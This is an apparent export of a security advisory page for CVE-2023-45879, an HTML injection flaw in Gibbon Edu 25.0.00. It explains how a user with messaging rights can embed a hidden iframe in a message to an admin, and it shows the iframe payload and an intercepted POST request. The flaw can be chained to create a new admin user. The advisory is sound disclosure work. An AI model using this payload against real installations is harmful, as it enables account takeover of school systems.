{"id":21253,"date":"2023-11-02T09:32:04","date_gmt":"2023-11-02T08:32:04","guid":{"rendered":"https:\/\/herolab.usd.de\/21247-2\/"},"modified":"2023-11-14T15:29:14","modified_gmt":"2023-11-14T14:29:14","slug":"usd-2023-0019","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2023-0019\/","title":{"rendered":"usd-2023-0019"},"content":{"rendered":"

[et_pb_section fb_built=\"1\" _builder_version=\"4.21.0\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.23.1\" _module_preset=\"default\" custom_padding=\"||13px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"]<\/p>\n

usd-2023-0019 | HTML Injection<\/h1>\n

<\/h1>\n

Advisory ID<\/strong>: usd-2023-0019
Product<\/strong>: Gibbon (https:\/\/gibbonedu.org\/)
Affected Version<\/strong>: 25.0.00
Vulnerability Type<\/strong>: CWE-79: HTML Injection<\/span>
Security Risk<\/strong>: Medium
Vendor URL<\/strong>: https:\/\/gibbonedu.org<\/a>
Vendor acknowledged vulnerability<\/strong>: Yes
Vendor Status<\/strong>: Fixed
CVE number<\/strong>: CVE-2023-45879<\/p>\n

Desciption<\/h3>\n

Gibbon Edu is an open-source educational software designed for schools and institutions to manage their administrative and academic processes
It offers a range of features to facilitate communication, collaboration, and organization within the educational community.<\/p>\n

A user with permissions to send messages can inject an iframe<\/strong> into the application.
This can be used to abuse a XSS\/CSRF vulnerability in the admin backend, to create a new admin user.<\/p>\n

The message can be send to an existing admin user. When the target opens the message, the (hidden) iframe<\/strong> will be embedded into the application.<\/p>\n

Proof of Concept<\/h3>\n

To create the message, navigate to the Home > Messenger > New Message<\/i> site.<\/p>\n

Fill the form and select an admin user as reciepent. Intercept the request and change the message body to<\/p>\n

<iframe src=\"http:\/\/responsible-disclosure:8989\/index.html\"><\/iframe><\/pre>\n
\n
<\/span>POST<\/span> \/modules\/Messenger\/messenger_postProcess.php <\/span>HTTP<\/span>\/<\/span>1.1<\/span>\nHost<\/span>:<\/span> localhost:8080<\/span>\n[...]<\/span>\n\n------WebKitFormBoundaryHs6JkrrxpoUfeRfX\nContent-Disposition: form-data; name=\"address\"\n\n\n\/modules\/Messenger\/messenger_post.php\n------WebKitFormBoundaryHs6JkrrxpoUfeRfX\nContent-Disposition: form-data; name=\"subject\"\n\ntest\n------WebKitFormBoundaryHs6JkrrxpoUfeRfX\nContent-Disposition: form-data; name=\"body\"\n\n<p><iframe src=\"http:\/\/localhost:8989\/index.html\"><\/iframe><\/p>\n------WebKitFormBoundaryHs6JkrrxpoUfeRfX\n[...]\nContent-Disposition: form-data; name=\"individualList[]\"\n\n0000000001\n------WebKitFormBoundaryHs6JkrrxpoUfeRfX--\n<\/pre>\n<\/div>\n
As shown in the screenshot below, the iframe is injected into the message.
\"\"<\/p>\n
 <\/p>\n
[\/et_pb_text][\/et_pb_column][\/et_pb_row][et_pb_row _builder_version=\"4.23.1\" _module_preset=\"default\"][et_pb_column _builder_version=\"4.23.1\" _module_preset=\"default\" type=\"4_4\"][et_pb_text _builder_version=\"4.23.1\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\"]<\/p>\n
This vulnerability can be chained with others, resulting in an exploit path that we demonstrated in this video:<\/p>\n
[\/et_pb_text][et_pb_code _builder_version=\"4.23.1\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\" max_width=\"67%\"]